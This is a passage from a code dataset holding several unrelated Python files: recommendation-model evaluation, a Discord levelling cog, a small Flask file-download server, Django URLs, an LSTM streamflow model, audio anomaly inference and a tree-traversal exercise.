range(input_length - 1):\n if ei == 0:\n continue\n for ele in input_variable[ei]:\n history_record[ele] += 1\n count += 1.0\n history_record = history_record / count\n\n # basket item iterator\n for ei in range(input_length - 1):\n if ei == 0:\n continue\n encoder_output, encoder_hidden = encoder(input_variable[ei], encoder_hidden)\n encoder_outputs[ei - 1] = encoder_output[0][0]\n\n for ii in range(k):\n vectorized_target = np.zeros(output_size)\n for idx in target_variable[ii + 1]:\n vectorized_target[idx] = 1\n\n vectorized_input = np.zeros(output_size)\n for idx in input_variable[ei]:\n vectorized_input[idx] = 1\n\n decoder_input = input_variable[input_length - 2]\n decoder_hidden = encoder_hidden\n last_hidden = decoder_hidden\n topk = 400\n decoded_vectors = []\n prob_vectors = []\n # k is the number of steps need to predicted, for next basket is 1\n for di in 
range(k):\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_outputs, history_record, last_hidden)\n # topv is top values, topi is top indicies.\n topv, topi = decoder_output.data.topk(topk)\n\n # construct target vector\n vectorized_target = np.zeros(output_size)\n for idx in target_variable[di + 1]:# iter the target basket.\n vectorized_target[idx] = 1\n\n count = 0\n if activate_codes_num > 0:\n pick_num = activate_codes_num\n else:\n pick_num = np.sum(vectorized_target)\n\n tmp = []\n for ele in range(len(topi[0])):\n if count >= pick_num:\n break\n tmp.append(topi[0][ele])\n count += 1\n decoded_vectors.append(tmp)\n decoder_input = tmp\n\n tmp = []\n for i in range(topk):\n tmp.append(topi[0][i])\n prob_vectors.append(tmp)\n\n return decoded_vectors, prob_vectors\n\n\ndef get_precision_recall_Fscore(groundtruth, pred):\n a = groundtruth\n b = pred\n correct = 0\n truth = 0\n positive = 0\n\n for idx in range(len(a)):\n if a[idx] == 1:\n truth += 1\n if b[idx] == 1:\n correct += 1\n if b[idx] == 1:\n positive += 1\n\n flag = 0\n if 0 == positive:\n precision = 0\n flag = 1\n # print('postivie is 0')\n else:\n precision = correct / positive\n if 0 == truth:\n recall = 0\n flag = 1\n # print('recall is 0')\n else:\n recall = correct / truth\n\n if flag == 0 and precision + recall > 0:\n F = 2 * precision * recall / (precision + recall)\n else:\n F = 0\n return precision, recall, F, correct\n\n\ndef get_F_score(prediction, test_Y):\n jaccard_similarity = []\n prec = []\n rec = []\n\n count = 0\n for idx in range(len(test_Y)):\n pred = prediction[idx]\n T = 0\n P = 0\n correct = 0\n for id in range(len(pred)):\n if test_Y[idx][id] == 1:\n T = T + 1\n if pred[id] == 1:\n correct = correct + 1\n if pred[id] == 1:\n P = P + 1\n\n if P == 0 or T == 0:\n continue\n precision = correct / P\n recall = correct / T\n prec.append(precision)\n rec.append(recall)\n if correct == 0:\n jaccard_similarity.append(0)\n else:\n jaccard_similarity.append(2 * precision * recall / (precision + recall))\n count = count + 1\n\n print(\n 'average precision: ' + str(np.mean(prec)))\n print('average recall : ' + str(\n np.mean(rec)))\n print('average F score: ' + str(\n np.mean(jaccard_similarity)))\n\n\ndef get_DCG(groundtruth, pred_rank_list, k):\n count = 0\n dcg = 0\n for pred in pred_rank_list:\n if count >= k:\n break\n if groundtruth[pred] == 1:\n dcg += (1) / math.log2(count + 1 + 1)\n count += 1\n\n return dcg\n\n\ndef get_NDCG(groundtruth, pred_rank_list, k):\n count = 0\n dcg = 0\n for pred in pred_rank_list:\n if count >= k:\n break\n if groundtruth[pred] == 1:\n dcg += (1) / math.log2(count + 1 + 1)\n count += 1\n idcg = 0\n num_real_item = np.sum(groundtruth)\n num_item = int(min(num_real_item, k))\n for i in range(num_item):\n idcg += (1) / math.log2(i + 1 + 1)\n ndcg = dcg / idcg\n return ndcg\n\n\ndef get_HT(groundtruth, pred_rank_list, k):\n count = 0\n for pred in pred_rank_list:\n if count >= k:\n break\n if groundtruth[pred] == 1:\n return 1\n count += 1\n\n return 0\n\n\ndef evaluate(history_data, future_data, encoder, decoder, output_size, test_key_set, next_k_step, activate_codes_num):\n #activate_codes_num: pick top x as the basket.\n prec = []\n rec = []\n F = []\n prec1 = []\n rec1 = []\n F1 = []\n prec2 = []\n rec2 = []\n F2 = []\n prec3 = []\n rec3 = []\n F3 = []\n\n NDCG = []\n n_hit = 0\n count = 0\n\n for iter in range(len(test_key_set)):\n # training_pair = training_pairs[iter - 1]\n # input_variable = training_pair[0]\n # 
target_variable = training_pair[1]\n input_variable = history_data[test_key_set[iter]]\n target_variable = future_data[test_key_set[iter]]\n\n if len(target_variable) < 2 + next_k_step:\n continue\n count += 1\n output_vectors, prob_vectors = decoding_next_k_step(encoder, decoder, input_variable, target_variable,\n output_size, next_k_step, activate_codes_num)\n\n hit = 0\n for idx in range(len(output_vectors)):\n # for idx in [2]:\n vectorized_target = np.zeros(output_size)\n for ii in target_variable[1 + idx]: #target_variable[[-1], [item, item], .., [-1]]\n vectorized_target[ii] = 1\n\n vectorized_output = np.zeros(output_size)\n for ii in output_vectors[idx]:\n vectorized_output[ii] = 1\n\n precision, recall, Fscore, correct = get_precision_recall_Fscore(vectorized_target, vectorized_output)\n prec.append(precision)\n rec.append(recall)\n F.append(Fscore)\n if idx == 0:\n prec1.append(precision)\n rec1.append(recall)\n F1.append(Fscore)\n elif idx == 1:\n prec2.append(precision)\n rec2.append(recall)\n F2.append(Fscore)\n elif idx == 2:\n prec3.append(precision)\n rec3.append(recall)\n F3.append(Fscore)\n # length[idx] += np.sum(target_variable[1 + idx])\n # prob_vectors is the probability\n target_topi = prob_vectors[idx]\n hit += get_HT(vectorized_target, target_topi, activate_codes_num)\n ndcg = get_NDCG(vectorized_target, target_topi, activate_codes_num)\n NDCG.append(ndcg)\n if hit == next_k_step:\n n_hit += 1\n\n return np.mean(rec), np.mean(NDCG), n_hit / len(test_key_set)\n\n\ndef get_codes_frequency_no_vector(history_data, num_dim, key_set):\n result_vector = np.zeros(num_dim)\n #pid is users id\n for pid in key_set:\n for idx in history_data[pid]:\n if idx == [-1]:\n continue\n result_vector[idx] += 1\n return result_vector\n\n\ndef main(argv):\n\n directory = './amodels/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n dataset = argv[1]\n ind = argv[2]\n history_file = '../../jsondata/'+dataset+'_history.json'\n future_file = '../../jsondata/'+dataset+'_future.json'\n keyset_file = '../../keyset/'+dataset+'_keyset_'+str(ind)+'.json'\n model_version = dataset+str(ind)\n topk = int(argv[3])\n training = int(argv[4])\n\n next_k_step = 1\n with open(history_file, 'r') as f:\n history_data = json.load(f)\n with open(future_file, 'r') as f:\n future_data = json.load(f)\n with open(keyset_file, 'r') as f:\n keyset = json.load(f)\n\n input_size = keyset['item_num']\n training_key_set = keyset['train']\n val_key_set = keyset['val']\n test_key_set = keyset['test']\n\n # weights is inverse personal top frequency. 
normalized by max freq.\n weights = np.zeros(input_size)\n codes_freq = get_codes_frequency_no_vector(history_data, input_size, future_data.keys())\n max_freq = max(codes_freq)\n for idx in range(len(codes_freq)):\n if codes_freq[idx] > 0:\n weights[idx] = max_freq / codes_freq[idx]\n else:\n weights[idx] = 0\n\n # Sets2sets model\n encoder = EncoderRNN_new(input_size, hidden_size, num_layers)\n attn_decoder = AttnDecoderRNN_new(hidden_size, input_size, num_layers, dropout_p=0.1)\n if use_cuda:\n encoder = encoder.cuda()\n attn_decoder = attn_decoder.cuda()\n\n # train mode or test mode\n if training == 1:\n trainIters(history_data, future_data, input_size, encoder, attn_decoder, model_version, training_key_set, val_key_set, weights,\n next_k_step, num_iter, topk)\n\n else:\n for i in [10, 20]: #top k\n valid_recall = []\n valid_ndcg = []\n valid_hr = []\n recall_list = []\n ndcg_list = []\n hr_list = []\n print('k = ' + str(i))\n for model_epoch in range(num_iter):\n print('Epoch: ', model_epoch)\n encoder_pathes = './models/encoder' + str(model_version) + '_model_epoch' + str(model_epoch)\n decoder_pathes = './models/decoder' + str(model_version) + '_model_epoch' + str(model_epoch)\n\n encoder_instance = torch.load(encoder_pathes, map_location=torch.device('cpu'))\n decoder_instance = torch.load(decoder_pathes, map_location=torch.device('cpu'))\n\n recall, ndcg, hr = evaluate(history_data, future_data, encoder_instance, decoder_instance, input_size,\n val_key_set, next_k_step, i)\n valid_recall.append(recall)\n valid_ndcg.append(ndcg)\n valid_hr.append(hr)\n recall, ndcg, hr = evaluate(history_data, future_data, encoder_instance, decoder_instance, input_size,\n test_key_set, next_k_step, i)\n recall_list.append(recall)\n ndcg_list.append(ndcg)\n hr_list.append(hr)\n valid_recall = np.asarray(valid_recall)\n valid_ndcg = np.asarray(valid_ndcg)\n valid_hr = np.asarray(valid_hr)\n idx1 = valid_recall.argsort()[::-1][0]\n idx2 = valid_ndcg.argsort()[::-1][0]\n idx3 = valid_hr.argsort()[::-1][0]\n print('max valid recall results:')\n print('Epoch: ', idx1)\n print('recall: ', recall_list[idx1])\n print('ndcg: ', ndcg_list[idx1])\n print('phr: ', hr_list[idx1])\n sys.stdout.flush()\n\n print('max valid ndcg results:')\n print('Epoch: ', idx2)\n print('recall: ', recall_list[idx2])\n print('ndcg: ', ndcg_list[idx2])\n print('phr: ', hr_list[idx2])\n sys.stdout.flush()\n\n print('max valid phr results:')\n print('Epoch: ', idx3)\n print('recall: ', recall_list[idx3])\n print('ndcg: ', ndcg_list[idx3])\n print('phr: ', hr_list[idx3])\n sys.stdout.flush()\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"liming-7/A-Next-Basket-Recommendation-Reality-Check","sub_path":"methods/sets2sets/sets2sets_new.py","file_name":"sets2sets_new.py","file_ext":"py","file_size_in_byte":26306,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"34842840320","text":"from cosmos.core.utilities import StaticProgressBar, converters\n\nimport io\nimport typing\nimport discord\n\nfrom discord.ext import commands\nfrom aiohttp import client_exceptions\nfrom .._models.base import GuildBaseCog\nfrom image_processor_client import exceptions\n\n\nclass ChannelConverter(commands.Converter):\n\n CHANNELS = [\n \"text\",\n \"voice\"\n ]\n\n async def convert(self, ctx, argument):\n if argument.lower() not in self.CHANNELS:\n raise commands.BadArgument\n return argument\n\n\nclass Levels(GuildBaseCog):\n \"\"\"A plugin to implement text or voice levelling 
feature in server and related commands.\"\"\"\n\n INESCAPABLE = False\n\n @GuildBaseCog.listener()\n async def on_text_level_up(self, profile, channel):\n # guild_profile = await self.bot.guild_cache.get_profile(profile.guild.id)\n # if channel in guild_profile.permissions.disabled_channels:\n # return\n # if guild_profile.get_logger(\"on_text_level_up\"):\n # return\n # embed = self.bot.theme.embeds.one_line.primary(f\"Congratulations {profile.user.name}! \"\n # f\"You advanced to level {profile.level}.\",\n # self.bot.theme.images.chevron)\n # await channel.send(profile.user.mention, embed=embed)\n pass\n\n async def get_level_embed(self, profile):\n try:\n member = profile.member\n except AttributeError:\n member = profile.user\n embed = self.bot.theme.embeds.primary()\n embed.set_author(name=member.display_name + \"'s Level and XP\", icon_url=member.avatar_url)\n text_level_value = f\"`RANK:` # **{await profile.get_text_rank()}**\" \\\n f\"\\n`LEVEL:` **{profile.level}**\" \\\n f\"\\n`XP:` **{profile.xp_progress[0]} / {profile.xp_progress[1]}**\" \\\n f\"\\n`TOTAL XP:` **{profile.xp}**\\n\" \\\n f\"```fix\\n{StaticProgressBar(profile.xp_progress[0], profile.xp_progress[1])}```\"\n voice_level_value = f\"`RANK:` # **{await profile.get_voice_rank()}**\" \\\n f\"\\n`LEVEL:` **{profile.voice_level}**\" \\\n f\"\\n`XP:` **{profile.voice_xp_progress[0]} / {profile.voice_xp_progress[1]}**\" \\\n f\"\\n`TOTAL XP:` **{profile.voice_xp}**\\n\" \\\n f\"```fix\\n{StaticProgressBar(profile.voice_xp_progress[0], profile.voice_xp_progress[1])}\" \\\n f\"```\"\n embed.add_field(name=\"⌨ Text Level\", value=text_level_value, inline=False)\n embed.add_field(name=\"🎤 Voice Level\", value=voice_level_value, inline=False)\n try:\n embed.set_footer(text=profile.guild.name, icon_url=profile.guild.icon_url)\n except AttributeError:\n embed.set_footer(text=\"Cosmos Levels\", icon_url=self.bot.user.avatar_url)\n return embed\n\n async def get_rank_card(self, profile):\n try:\n member = profile.member\n except AttributeError:\n member = profile.user\n payload = {\n \"name\": member.name, \"discriminator\": f\"#{member.discriminator}\", \"avatar_url\": str(member.avatar_url),\n \"text_rank\": await profile.get_text_rank(),\n \"text_xp\": profile.xp_progress[0], \"text_target_xp\": profile.xp_progress[1], \"text_total_xp\": profile.xp,\n \"text_level\": profile.level,\n \"voice_rank\": await profile.get_voice_rank(),\n \"voice_xp\": profile.voice_xp_progress[0], \"voice_target_xp\": profile.voice_xp_progress[1],\n \"voice_total_xp\": profile.voice_xp, \"voice_level\": profile.voice_level,\n }\n rank_card_bytes = await self.bot.image_processor.discord.get_profile_rank_card(**payload)\n return discord.File(io.BytesIO(rank_card_bytes), filename=\"rank.png\")\n\n @GuildBaseCog.cooldown(1, 10, GuildBaseCog.bucket_type.member)\n @GuildBaseCog.group(name=\"уровень\", aliases=[\"лвл\", \"rank\"], invoke_without_command=True, inescapable=False)\n async def levels(self, ctx, *, member: discord.ext.commands.MemberConverter = None):\n \"\"\"Displays current rank, level and experience points gained in current server.\"\"\"\n member = member or ctx.author\n profile = await self.bot.profile_cache.get_guild_profile(member.id, ctx.guild.id)\n try:\n async with ctx.loading():\n file = await self.get_rank_card(profile)\n await ctx.send(file=file)\n except (exceptions.InternalServerError, client_exceptions.ClientConnectorError):\n embed = await self.get_level_embed(profile)\n await ctx.send(embed=embed)\n\n @GuildBaseCog.cooldown(1, 
10, GuildBaseCog.bucket_type.user)\n @levels.command(name=\"global\", aliases=[\"cosmos\", \"globals\"])\n async def global_levels(self, ctx, *, member: discord.ext.commands.MemberConverter = None):\n \"\"\"Displays current rank, level and experience points gained globally across all mutual servers.\"\"\"\n member = member or ctx.author\n profile = await self.bot.profile_cache.get_profile(member.id)\n try:\n async with ctx.loading():\n file = await self.get_rank_card(profile)\n await ctx.send(file=file)\n except (exceptions.InternalServerError, client_exceptions.ClientConnectorError):\n embed = await self.get_level_embed(profile)\n await ctx.send(embed=embed)\n\n @staticmethod\n async def __rewards_parser(_, entry, __): # reward, rewards\n value = str()\n if entry.points:\n value += f\"`Points:` **{entry.points}**\\n\"\n value += f\"`Roles:` \" + \" \".join([f\"<@&{_}>\" for _ in entry.roles])\n return f\"Level {entry.level}\", value\n\n @levels.command(name=\"reset\")\n async def reset_user_levels(self, ctx):\n pass # TODO: Add option to reset everyone's guild xp.\n\n @levels.group(name=\"reward\", aliases=[\"rewards\"], invoke_without_command=True)\n async def rewards(self, ctx, channel: typing.Optional[ChannelConverter] = \"text\", level: int = None):\n \"\"\"Displays any rewards set for specified or all of the levels.\n Optionally pass `text` to view Text Levels rewards and `voice` for Voice Levels rewards.\n\n \"\"\"\n rewards = ctx.guild_profile.levels.get_rewards(channel)\n if not rewards:\n return await ctx.send_line(f\"{ctx.emotes.web_emotion.xx} Мы ещё не установили {channel.title()} XP на сервере.\")\n description = \"```css\\n Отображение уровней и их наград, присуждаемые за полученную XP```\"\n if not level:\n paginator = ctx.get_field_paginator(\n sorted(\n rewards.values(), key=lambda reward: reward.level\n ), show_author=False, entry_parser=self.__rewards_parser)\n paginator.embed.description = description\n paginator.embed.set_author(name=f\"Level {channel} Rewards\".title(), icon_url=ctx.guild.icon_url)\n return await paginator.paginate()\n _reward = rewards.get(level)\n if not _reward:\n return await ctx.send_line(f\"{ctx.emotes.web_emotion.xx} Награды для {channel.title()} не предназначены для {level} уровня.\")\n embed = self.bot.theme.embeds.primary()\n embed.description = description\n embed.set_author(name=f\"Награды {channel.title()} Level {level}\", icon_url=ctx.guild.icon_url)\n embed.add_field(name=\"Roles\", value=\" \".join([f\"<@&{role_id}>\" for role_id in _reward.roles]))\n embed.add_field(name=\"Points\", value=_reward.points)\n await ctx.send(embed=embed)\n\n @rewards.command(name=\"set\")\n @commands.has_permissions(administrator=True)\n async def set_rewards(self, ctx, level: int, channel: typing.Optional[ChannelConverter] = \"text\",\n points: typing.Optional[int] = 0, *, roles: converters.RoleConvertor()):\n \"\"\"Set rewards for specified Text or Voice Levels.\n You can set one or multiple roles and optionally Guild Points as rewards.\n\n \"\"\"\n embed = self.bot.theme.embeds.primary()\n embed.set_author(name=f\"Are you sure to set following rewards for \"\n f\"{channel.title()} Level {level}?\", icon_url=ctx.guild.icon_url)\n embed.add_field(name=\"Roles\", value=\" \".join([role.mention for role in roles]))\n embed.add_field(name=\"Points\", value=points)\n if await ctx.confirm(await ctx.send(embed=embed)):\n await ctx.guild_profile.levels.set_rewards(level, [role.id for role in roles], points, channel=channel)\n await 
ctx.send_line(f\"{ctx.emotes.web_emotion.galka} Награда за {channel.title()} Level {level} была установлена.\")\n\n @rewards.command(name=\"remove\", aliases=[\"delete\"])\n @commands.has_permissions(administrator=True)\n async def remove_rewards(self, ctx, level: int, channel: ChannelConverter = \"text\"):\n \"\"\"Remove any Text or Voice Level rewards set for specified level.\"\"\"\n if not ctx.guild_profile.levels.get_rewards(channel).get(level):\n return await ctx.send_line(f\"{ctx.emotes.web_emotion.xx} There are no rewards assigned for level {level}.\")\n if not await ctx.confirm():\n return\n await ctx.guild_profile.levels.remove_rewards(level, channel=channel)\n await ctx.send_line(f\"{ctx.emotes.web_emotion.galka} Награда за {level} была удалена\")\n","repo_name":"MrFreemanser/Bot","sub_path":"cosmos/galaxies/guild/levels/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8490594164","text":"from flask import Flask\nfrom flask import send_file\nimport sys\nimport argparse\n\n\napp = Flask('download file')\nGLOBALS = {}\n\n\ndef parse_arguments():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--path', type=str, required=True)\n\tparser.add_argument('--port', default=5000, type=int)\n\targs = parser.parse_args()\n\treturn args.path, args.port\n\n\t\n@app.route('/')\ndef download_file():\n\treturn send_file(GLOBALS['path'], as_attachment=True)\n\n\t\nif __name__ == '__main__':\n\tpath, port = parse_arguments()\n\tGLOBALS['path'] = path\n\tapp.run(host='0.0.0.0', port=port)\n","repo_name":"linoyazdi/best-black-box-ever","sub_path":"download file website/download_website.py","file_name":"download_website.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13972486074","text":"from django.conf.urls import url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.news, name='news'),\n url(r'^(?P[0-9]+)/$', views.news_detail, name='news_detail'),\n url(r'^(?P[0-9]+)/comment/$', views.add_comment_to_news, name='add_comment_to_news'),\n url(r'^(?P[0-9]+)/edit/$', views.news_edit, name='news_edit'),\n url(r'^new/$', views.news_new, name='news_new'),\n\n]\n","repo_name":"lauosi/library-django","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28657419169","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport random\nimport tensorflow as tf\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential, Input, Model\nfrom keras import optimizers\nfrom keras.layers import LSTM, Dense, Dropout\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\n## fix the figure size and axes grid\nmpl.rcParams['figure.figsize'] = (12,8)\nmpl.rcParams['axes.grid'] = False\n\n## shifts columns of dataframe df by shift\ndef supervised(df,cols,shift):\n n_cols=len(cols)\n ##shifts columns of dataframe df by shift\n n_cols=len(cols)\n ad=df.iloc[:,cols]\n nms=ad.columns\n cols,names=[],[]\n for i in range(shift,0,-1):\n cols.append(ad.shift(i))\n names+=[('%s(t-%d)'%(nms[j],i)) for j in range(len(nms))]\n cols.append(ad.shift(0))\n names+=[('%s(t)'%(nms[j])) for j in range(len(nms))]\n agg=pd.concat(cols,axis=1)\n agg.columns=names \n agg.dropna(inplace=True)\n return agg\n\n## this function removed the data from simulated and observed data wherever the observed data contains nan\ndef filter_nan(s,o):\n data = np.array([s.flatten(),o.flatten()])\n data = np.transpose(data)\n return data[:,0],data[:,1]\n\n## Evaluation metrics\ndef NS(s,o):\n \n #Nash Sutcliffe efficiency coefficient\n #input:\n #s: simulated\n #o: observed\n #output:\n #ns: Nash Sutcliffe efficient coefficient\n \n s,o = filter_nan(s,o)\n return 1 - sum((s-o)**2)/sum((o-np.mean(o))**2)\ndef pc_bias(s,o):\n \"\"\"\n Percent Bias\n input:\n s: simulated\n o: observed\n output:\n pc_bias: percent bias\n \"\"\"\n s,o = filter_nan(s,o)\n return 100.0*sum(o-s)/sum(o)\ndef rmse(s,o):\n \"\"\"\n Root Mean Squared Error\n input:\n s: simulated\n o: observed\n output:\n rmses: root mean squared error\n \"\"\"\n s,o = filter_nan(s,o)\n return np.sqrt(np.mean((s-o)**2))\ndef WB(s,o):\n s,o = filter_nan(s,o)\n return 1 - abs(1 - ((sum(s))/(sum(o))))\n\n## import data\ndf = pd.read_csv('keesara_catchment_daily_ML_input_data.csv')\n\n## define training period\ncal_start = '1998-01-01' \ncal_end = '2010-12-31'\ntraining_period = len(pd.date_range(start = cal_start,end = cal_end))\n\nperform = pd.DataFrame()\nperform[\"Dropout\"] = \"\"\nperform[\"Epochs\"] = \"\"\nperform[\"Hidden_units\"] = \"\"\n\nperform['Batch_size_Q'] = \"\"\nperform[\"NSE_cal_Q\"] = \"\"\nperform[\"PBIAS_cal_Q\"] = \"\"\nperform[\"RMSE_cal_Q\"] = \"\"\nperform[\"WB_cal_Q\"] = \"\"\nperform[\"NSE_val_Q\"] = \"\"\nperform[\"PBIAS_val_Q\"] = \"\"\nperform[\"RMSE_val_Q\"] = \"\"\nperform[\"WB_val_Q\"] = \"\"\n\n## select required data for prediction of given variable\ndata_Q = df[['Pptn_total','PET_total','Q_ds']]\nndays = 1 \nnfuture = 1 \nninputs_Q = 2\nndays_Q = 1\nnobs_Q = ndays_Q * ninputs_Q\nNtest = training_period\n\n## model hyperparameters\nhidden_units_Q = 20\ndropout_Q = 0.4\nbatch_size_Q = 32\nepochs_Q = 
300\n\n### Q prediction\nreframed_Q = supervised(data_Q,[0,1,2],0) \nreframed_new_Q = reframed_Q[['Pptn_total(t)','PET_total(t)','Q_ds(t)']]\n\n## split into train and test datasets\nXYdata_Q = reframed_new_Q.values\nXYtrain_Q = XYdata_Q[:Ntest, :]\nXYtest_Q = XYdata_Q[Ntest:, :]\nyobs_train_Q = XYdata_Q[:Ntest, -1:]\nyobs_test_Q = XYdata_Q[Ntest:, -1:]\nscaledXYtrain_Q = XYtrain_Q\nscaledXYtest_Q = XYtest_Q\n\n## split into input and outputs\ntrain_X_Q, train_y_Q = scaledXYtrain_Q[:, :nobs_Q], scaledXYtrain_Q[:, -1:]\ntest_X_Q = scaledXYtest_Q[:, :nobs_Q]\ntrain_X_Q = train_X_Q.reshape((train_X_Q.shape[0], ndays_Q, ninputs_Q))\ntest_X_Q = test_X_Q.reshape((test_X_Q.shape[0], ndays_Q, ninputs_Q))\n\n## define and fit LSTM model\nnp.random.seed(1234)\ntf.random.set_seed(1234)\nmodel_Q = Sequential() \nmodel_Q.add(LSTM(hidden_units_Q, input_shape=(train_X_Q.shape[1], train_X_Q.shape[2])))\nmodel_Q.add(Dropout(dropout_Q))\nmodel_Q.add(Dense(1, activation = 'relu')) \nmodel_Q.compile(loss = 'mse',optimizer='adam') \nhistory_Q = model_Q.fit(train_X_Q, train_y_Q, batch_size = batch_size_Q, epochs=epochs_Q, shuffle=True,validation_split=0.2, verbose=0)\nplt.plot(history_Q.history['loss'])\nplt.plot(history_Q.history['val_loss'])\nplt.title('model loss for Q prediction')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper right')\nplt.show()\n\n## outputs in training\nyhat_Q = model_Q.predict(train_X_Q)\ntrain_X_Q = train_X_Q.reshape((train_X_Q.shape[0], nobs_Q))\ninv_yhat_Q = np.concatenate((train_X_Q, yhat_Q), axis=1)\nNNytrain_Q = inv_yhat_Q[:,-1:]\ntrain_X_Q = train_X_Q.reshape((train_X_Q.shape[0], ndays_Q, ninputs_Q))\n\n## outputs in testing\nyhat_test_Q = model_Q.predict(test_X_Q)\ntest_X_Q = test_X_Q.reshape((test_X_Q.shape[0], nobs_Q))\ninv_yhat_test_Q = np.concatenate((test_X_Q, yhat_test_Q), axis=1)\nNNytest_Q = inv_yhat_test_Q[:,-1:]\ntest_X_Q = test_X_Q.reshape((test_X_Q.shape[0], ndays_Q, ninputs_Q))\nmean_train_Q = np.array(NNytrain_Q)\nmean_test_Q = np.array(NNytest_Q)\n\n## evaluate outputs\n(s,o) = (mean_test_Q[:], yobs_test_Q[:])\nNS_Q = NS(s,o)\nPBIAS_Q = pc_bias(s,o)\nRMSE_Q = rmse(s,o)\nWB_Q = WB(s,o)\n(s_train, o_train) = (mean_train_Q, yobs_train_Q)\nNS_Q_cal = NS(s_train, o_train)\nPBIAS_Q_cal = pc_bias(s_train,o_train)\nRMSE_Q_cal = rmse(s_train,o_train)\nWB_Q_cal = WB(s_train, o_train)\nop = df[['Date','Pptn_total','PET_total','Q_ds']][Ntest:] \nop1 = op.reset_index(drop=True)\nop1['Q_ml_sim'] = s[:]\nop1.to_csv('keesara_catchment_ML_testing_output.csv')\n\nperform = perform.append({\"Dropout\":dropout_Q,\"Epochs\":epochs_Q,\"Hidden_units\":hidden_units_Q,'Batch_size_Q' : batch_size_Q, \n\"NSE_cal_Q\" : NS_Q_cal, \n\"PBIAS_cal_Q\" : PBIAS_Q_cal, \n\"RMSE_cal_Q\" : RMSE_Q_cal, \n\"WB_cal_Q\" : WB_Q_cal, \n\"NSE_val_Q\" : NS_Q, \n\"PBIAS_val_Q\" : PBIAS_Q, \n\"RMSE_val_Q\" : RMSE_Q, \n\"WB_val_Q\" : WB_Q },ignore_index = True) \nprint(perform)\n\n","repo_name":"pravin2408/PIML_daily_predictions_JOH","sub_path":"ML_LSTM_daily_predictions.py","file_name":"ML_LSTM_daily_predictions.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72536005672","text":"import io\n\nimport numpy as np\nfrom scipy.io.wavfile import read\n\nfrom inference_utils import make_spec, make_batch, get_percent2, numpy_mse\n\ncur_threshold = 130\n\n\ndef pipeline(model, input_wav, classifier=None, secs=6):\n\n sr, audio = read(io.BytesIO(input_wav))\n if audio.dtype != 
'float32':\n audio = audio.astype(np.float32, order='C') / 32768.0\n if sr == 48000:\n # 0 for left channel, 1 for right\n if audio.ndim == 1:\n audio = audio[:int(sr*secs)]\n else:\n audio = audio[:int(sr*secs), 0]\n else:\n print(f'Invalid sample rate: {sr}. 48000 needed')\n\n spec = make_spec(audio, mel=True)\n mfcc = make_batch(spec)\n\n model_out = model.run(None, {'input_1': mfcc})\n mse_val = numpy_mse(mfcc, model_out[0])\n percent = get_percent2(mse_val, cur_threshold, 5)\n if classifier:\n class_out = np.argmax(classifier.run(None, {'input_1': mfcc}))\n return mse_val, percent, class_out.item()\n return mse_val, percent\n\n","repo_name":"ffs333/anomaly_VAE","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27394778898","text":"import sys\nsys.stdin = open('tree_input.txt')\n\n\ndef preorder(node):\n if node != 0:\n # 전위 순회기 떄문에\n # 내가 할일 먼저 한다.\n # 지금 문제에서 할일은? 나를 출력\n print(node, end=' ')\n # 왼쪽 자식을 조사\n preorder(left[node])\n # 오른쪽 자식을 조사\n preorder(right[node])\n\ndef inorder(node):\n if node != 0:\n # 왼쪽 자식을 조사\n inorder(left[node])\n # 중위 순회\n print(node, end=' ')\n # 오른쪽 자식을 조사\n inorder(right[node])\n\ndef postorder(node):\n if node != 0:\n # 왼쪽 자식을 조사\n postorder(left[node])\n # 오른쪽 자식을 조사\n postorder(right[node])\n # 후위 순회\n print(node, end=' ')\n\nV = int(input()) # 노드의 개수\nE = V -1 # 간선의 개수\nedge = list(map(int, input().split()))\nprint(edge)\n\n# 인덱스를 활용할 것이기 때문에 노드의 개수 +1\n# 0번 노드는 없음\nparent = [0] * (V+1) # 부모의 정보\nleft = [0] * (V+1) # 왼쪽 자식 정보\nright = [0] * (V+1) # 오른쪽 자식 정보\n\ntree = [[0] * 3 for _ in range(V+1)]\n\nfor i in range(E):\n p, c = edge[i*2], edge[i*2+1]\n print(p, c)\n if left[p] == 0: # 아직 왼쪽 자식이 없으면\n left[p] = c # p번의 왼쪽 자식 c\n\n else: #왼쪽에 자식이 있으면\n right[p] = c\n parent[c] = p\n\n if tree[p][0] == 0:\n tree[p][0] = c\n else:\n tree[p][1] = c\n tree[c][2] = p\n # print(left, right, parent)\nprint(tree)\n\nroot = 0\nfor i in range(1, V+1): # 모든노드를 순회\n if parent[i] == 0: # 부모정보를 담았는데, 부모가 없으면 root\n root = i\n break\n# 조사를 시작 root 노드부터\nprint('---전위 순회')\npreorder(root)\nprint()\n\nprint('---중위 순회')\ninorder(root)\nprint()\nprint('---후위 순회')\npostorder(root)\n","repo_name":"PassionSoftIan/algo","sub_path":"PPT/230222_Tree/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12310364576","text":"u\"\"\"This is the synchronisation of the RefDB database with the Django database.\nIt is activated by::\n\n ./manage.py syncdb\n\nand answering \"yes\" to 